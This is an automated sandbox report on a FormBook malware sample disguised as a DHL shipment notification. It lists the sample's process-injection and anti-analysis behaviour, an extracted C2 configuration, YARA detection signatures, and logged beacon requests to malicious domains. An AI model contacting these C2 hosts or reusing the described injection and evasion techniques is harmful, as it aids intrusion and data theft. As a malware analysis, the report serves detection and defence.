Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DHL SHIPMENT NOTIFICATION 1146789443.exe

Overview

General Information

Sample Name:DHL SHIPMENT NOTIFICATION 1146789443.exe
Analysis ID:626119
MD5:8fbdf9f70b21179d87b83fe47b2137dd
SHA1:146eebe16adad9486cac66f4574810cec1f56cbb
SHA256:972bc525f6be5f7281a72ec4887cc5b85f4b064463bba234f1258c967b164026
Tags:exeFormbook
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DHL SHIPMENT NOTIFICATION 1146789443.exe (PID: 6224 cmdline: "C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exe" MD5: 8FBDF9F70B21179D87B83FE47B2137DD)
    • aeokw.exe (PID: 6272 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
      • aeokw.exe (PID: 6288 cmdline: C:\Users\user\AppData\Local\Temp\aeokw.exe C:\Users\user\AppData\Local\Temp\fnnok MD5: 6F70881E0183CE9F78E300CF2C8DC48E)
        • explorer.exe (PID: 3616 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.exe (PID: 2360 cmdline: C:\Windows\SysWOW64\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
            • cmd.exe (PID: 6308 cmdline: /c del "C:\Users\user\AppData\Local\Temp\aeokw.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 1524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.lgf7.com/amdf/"], "decoy": ["xadazheng.com", "bremorgan.com", "keilaniclothing.com", "du9a20ofolvhfr.xyz", "santamariacourt.com", "wcagls.com", "visionuptechnology.com", "sddysrq.com", "pencetslot.site", "wpcoisas.com", "caomei08.xyz", "infinitepotential.xyz", "anotherchanceranch.net", "ymterp.com", "zhuyunming.com", "elementarymodel.com", "edmondsonfinancial.com", "adsnethosting.com", "obohsan-souzokusindan.tech", "helicopterart.com", "shangnuanjia.com", "89660.world", "zkzxconsulting.com", "temp-bait.com", "8562.pet", "taojinwa.net", "chatterboxtwo.com", "pejoki.com", "effectual-science.com", "ma3721.com", "b498gszj.com", "sicuumon.com", "northwtb.com", "reconbattery.xyz", "sibirerzucht.com", "fusionpsychiatry.net", "biblicalguidance.net", "liquated99tic.com", "ruvinslimshop.com", "attjeans.com", "reservedadseyelevel.com", "theselungs.com", "safe-edd-centerhelp92.com", "provercoop.com", "216498.com", "bbqautopilot.com", "nurhurdacilik.com", "zo177.wales", "doublemsporthorses.com", "hl308.com", "movewhenyouwant.com", "smartinvestorsguide.com", "joga-wroclaw.com", "potionsparchment.com", "rtpholywin99.com", "sosocean.com", "vliralip.com", "alphaomegamerch.net", "pallettruckload.com", "spritzdao.xyz", "unbound-soul.com", "enssale.xyz", "capitalisllc.com", "ultrakill.xyz"]}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x16a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x1191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x191f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x40c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x78e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x88ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x4809:$sqlite3step: 68 34 1C 7B E1
    • 0x491c:$sqlite3step: 68 34 1C 7B E1
    • 0x4838:$sqlite3text: 68 38 2A 90 C5
    • 0x495d:$sqlite3text: 68 38 2A 90 C5
    • 0x484b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x4973:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 28 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.0.aeokw.exe.400000.8.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.0.aeokw.exe.400000.8.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x148a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x149a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x978a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1360c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa483:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1aae7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1baea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.0.aeokw.exe.400000.8.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x17a09:$sqlite3step: 68 34 1C 7B E1
        • 0x17b1c:$sqlite3step: 68 34 1C 7B E1
        • 0x17a38:$sqlite3text: 68 38 2A 90 C5
        • 0x17b5d:$sqlite3text: 68 38 2A 90 C5
        • 0x17a4b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17b73:$sqlite3blob: 68 53 D8 7F 8C
        1.2.aeokw.exe.12a0000.1.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          1.2.aeokw.exe.12a0000.1.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b72:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1591f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa58a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1440c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb283:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b8e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c8ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 22 entries

          Sigma Signatures

          No Sigma rule has matched

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Found malware configuration
          Source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.lgf7.com/amdf/"], "decoy": ["xadazheng.com", "bremorgan.com", "keilaniclothing.com", "du9a20ofolvhfr.xyz", "santamariacourt.com", "wcagls.com", "visionuptechnology.com", "sddysrq.com", "pencetslot.site", "wpcoisas.com", "caomei08.xyz", "infinitepotential.xyz", "anotherchanceranch.net", "ymterp.com", "zhuyunming.com", "elementarymodel.com", "edmondsonfinancial.com", "adsnethosting.com", "obohsan-souzokusindan.tech", "helicopterart.com", "shangnuanjia.com", "89660.world", "zkzxconsulting.com", "temp-bait.com", "8562.pet", "taojinwa.net", "chatterboxtwo.com", "pejoki.com", "effectual-science.com", "ma3721.com", "b498gszj.com", "sicuumon.com", "northwtb.com", "reconbattery.xyz", "sibirerzucht.com", "fusionpsychiatry.net", "biblicalguidance.net", "liquated99tic.com", "ruvinslimshop.com", "attjeans.com", "reservedadseyelevel.com", "theselungs.com", "safe-edd-centerhelp92.com", "provercoop.com", "216498.com", "bbqautopilot.com", "nurhurdacilik.com", "zo177.wales", "doublemsporthorses.com", "hl308.com", "movewhenyouwant.com", "smartinvestorsguide.com", "joga-wroclaw.com", "potionsparchment.com", "rtpholywin99.com", "sosocean.com", "vliralip.com", "alphaomegamerch.net", "pallettruckload.com", "spritzdao.xyz", "unbound-soul.com", "enssale.xyz", "capitalisllc.com", "ultrakill.xyz"]}
          Multi AV Scanner detection for submitted file
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeVirustotal: Detection: 42%Perma Link
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeReversingLabs: Detection: 48%
          Yara detected FormBook
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.aeokw.exe.12a0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.aeokw.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.0.aeokw.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000005.00000000.294568326.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322163759.0000000000DD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.322197992.0000000001100000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.256268925.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.321951084.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.310303298.000000000E814000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513829968.0000000002E30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.512812495.0000000002380000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000011.00000002.513722693.0000000002E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.258171974.00000000012A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000000.254937698.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
          Antivirus detection for URL or domain
          Source: http://www.rtpholywin99.com/amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBxAvira URL Cloud: Label: malware
          Source: www.lgf7.com/amdf/Avira URL Cloud: Label: malware
          Machine Learning detection for sample
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeJoe Sandbox ML: detected
          Source: 2.0.aeokw.exe.400000.8.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.aeokw.exe.12a0000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aeokw.exe.400000.6.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.0.aeokw.exe.400000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 2.2.aeokw.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: DHL SHIPMENT NOTIFICATION 1146789443.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: C:\mvbaz\xgpqcu\xwqn\f27888ddf02c4c6aa9eb1b8f5b3a0302\rlifld\nwoxnqyr\Release\nwoxnqyr.pdb source: DHL SHIPMENT NOTIFICATION 1146789443.exe, 00000000.00000002.271439175.0000000000789000.00000004.00000001.01000000.00000003.sdmp, aeokw.exe, 00000001.00000002.258082115.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000001.00000000.249383523.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, aeokw.exe, 00000002.00000002.322132231.0000000000D7E000.00000002.00000001.01000000.00000004.sdmp, svchost.exe, 00000011.00000002.515611102.000000000352F000.00000004.10000000.00040000.00000000.sdmp, nsk2671.tmp.0.dr, aeokw.exe.0.dr
          Source: Binary string: wntdll.pdbUGP source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040290B FindFirstFileW,
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 4x nop then pop ebx
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 4x nop then pop edi
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop ebx
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\explorer.exeNetwork Connect: 23.227.38.74 80
          Source: C:\Windows\explorer.exeDomain query: www.ultrakill.xyz
          Source: C:\Windows\explorer.exeNetwork Connect: 3.64.163.50 80
          Source: C:\Windows\explorer.exeNetwork Connect: 142.250.185.115 80
          Source: C:\Windows\explorer.exeDomain query: www.rtpholywin99.com
          Source: C:\Windows\explorer.exeDomain query: www.keilaniclothing.com
          Performs DNS queries to domains with low reputation
          Source: C:\Windows\explorer.exeDNS query: www.ultrakill.xyz
          C2 URLs / IPs found in malware configuration
          Source: Malware configuration extractorURLs: www.lgf7.com/amdf/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=Trmpqgljk9XuX6wxdqqXIm/y+wmhK8tfRywx+ln+mTz4pafXVdYl+/2RwiFK/8XcMfBx HTTP/1.1Host: www.rtpholywin99.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?9rF=/oFEaKse3b+9bUwDmBZBOOdpMJRIltPBO/GIVMmFEKpLcaQ5ll8yuFZgv1Udvzfmdn1m&oTsXW=bHtTbh8HU HTTP/1.1Host: www.keilaniclothing.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /amdf/?oTsXW=bHtTbh8HU&9rF=2pnwrPnaayjLTa+dMDr3ioSS0RS/WyH1Gjote8OZi1oxTz0HZpyyfRSy0TFJ31yfLnqh HTTP/1.1Host: www.ultrakill.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=UTF-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 13 May 2022 14:10:37 GMTX-Content-Type-Options: nosniffX-XSS-Protection: 1; mode=blockServer: GSEAccept-Ranges: noneVary: Accept-EncodingTransfer-Encoding: chunkedConnection: closeData Raw: 62 31 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 42 6c 6f 67 67 65 72 20 69 73 20 61 20 62 6c 6f 67 20 70 75 62 6c 69 73 68 69 6e 67 20 74 6f 6f 6c 20 66 72 6f 6d 20 47 6f 6f 67 6c 65 20 66 6f 72 20 65 61 73 69 6c 79 20 73 68 61 72 69 6e 67 20 79 6f 75 72 20 74 68 6f 75 67 68 74 73 20 77 69 74 68 20 74 68 65 20 77 6f 72 6c 64 2e 20 42 6c 6f 67 67 65 72 20 6d 61 6b 65 73 20 69 74 20 73 69 6d 70 6c 65 20 74 6f 20 70 6f 73 74 20 74 65 78 74 2c 20 70 68 6f 74 6f 73 20 61 6e 64 20 76 69 64 65 6f 20 6f 6e 74 6f 20 79 6f 75 72 20 70 65 72 73 6f 6e 61 6c 20 6f 72 20 74 65 61 6d 20 62 6c 6f 67 2e 22 3e 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 62 6c 6f 67 67 65 72 2c 20 62 6c 6f 67 73 70 6f 74 2c 20 62 6c 6f 67 2c 20 62 6c 6f 67 67 65 72 2e 63 6f 6d 2c 20 62 6c 6f 67 73 70 6f 74 2e 63 6f 6d 2c 20 70 65 72 73 6f 6e 61 6c 20 62 6c 6f 67 2c 20 77 65 62 6c 6f 67 2c 20 63 72 65 61 74 65 20 62 6c 6f 67 2c 20 6e 65 77 20 62 6c 6f 67 22 3e 0a 3c 62 61 73 65 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 22 3e 0a 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 23 68 6f 6d 65 42 75 74 74 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 32 37 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 6c 6f 67 67 65 72 2e 63 6f 6d 2f 73 74 61 74 69 63 2f 76 31 2f 76 2d 63 73 73 2f 33 38 39 36 35 35 38 36 37 33 2d 6e 65 77 5f 75 69 5f 73 74 61 74 69 63 5f 70 61 67 65 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 63 6c 61 73 73 3d 22 6c 61 6e 67 5f 65 6e 20 72 62 22 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 13 May 2022 14:10:57 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Sorting-Hat-PodId: 250X-Sorting-Hat-ShopId: 64045383931X-Dc: gcp-europe-west1X-Request-ID: c795f513-2a89-4e29-a885-b65e0c1175bdX-XSS-Protection: 1; mode=blockX-Download-Options: noopenX-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneCF-Cache-Status: DYNAMICServer: cloudflareCF-RAY: 70abfb06ecb2917d-FRAalt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400Data Raw: 31 34 31 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 65 76 65 72 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 20 64 65 6e 69 65 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 2a 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 62 6f 72 64 65 72 2d 62 6f 78 3b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 46 31 46 31 46 31 3b 66 6f 6e 74 2d 73 69 7a 65 3a 36 32 2e 35 25 3b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 7d 62 6f 64 79 7b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 37 72 65 6d 7d 61 7b 63 6f 6c 6f 72 3a 23 33 30 33 30 33 30 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 31 70 78 20 73 6f 6c 69 64 20 23 33 30 33 30 33 30 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 3b 74 72 61 6e 73 69 74 69 6f 6e 3a 62 6f 72 64 65 72 2d 63 6f 6c 6f 72 20 30 2e 32 73 20 65 61 73 65 2d 69 6e 7d 61 3a 68 6f 76 65 72 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 63 6f 6c 6f 72 3a 23 41 39 41 39 41 39 7d 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 38 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 6d 61 72 67 69 6e 3a 30 20 30 20 31 2e 34 72 65 6d 20 30 7d 70 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 7d 2e 70 61 67 65 7b 70 61 64 64 69 6e 67 3a 34 72 65 6d 20 33 2e 35 72 65 6d 3b 6d 61 72 67 69 6e 3a 30 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 